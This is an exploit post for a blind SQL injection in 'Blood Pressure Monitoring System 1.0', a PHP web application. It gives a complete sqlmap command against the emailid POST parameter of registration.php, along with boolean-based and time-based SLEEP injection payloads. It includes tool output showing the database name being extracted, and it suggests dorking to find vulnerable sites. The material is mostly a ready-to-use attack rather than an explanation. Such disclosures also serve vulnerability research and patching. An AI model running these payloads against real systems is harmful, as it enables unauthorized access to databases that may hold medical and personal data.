============================================================================================================================================= | # Title : Blood Pressure Monitoring System 1.0 Blind Sql Injection injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_bp-monitoring-management-s.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : E:\sqlmap>python sqlmap.py -u 127.0.0.1//bpmms/registration.php --method POST --data "submit=&emailid=if" -p emailid --risk 3 --level 3 --dbms mysql --batch --current-db [+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1 --- Parameter: emailid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: submit=&emailid=if' AND 9071=9071 AND 'xVZD'='xVZD Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: submit=&emailid=if' AND (SELECT 2282 FROM (SELECT(SLEEP(5)))lwti) AND 'gxpM'='gxpM --- [18:10:58] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.58, PHP 8.0.30 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [18:10:58] [INFO] fetching current database [18:10:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [18:10:58] [INFO] retrieved: bpmmsdb current database: 'bpmmsdb' [18:11:00] [INFO] fetched data logged to text files under 'C:\Users\indoushka\AppData\Local\sqlmap\output\127.0.0.1' [*] ending @ 18:11:00 /2024-09-20/ Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================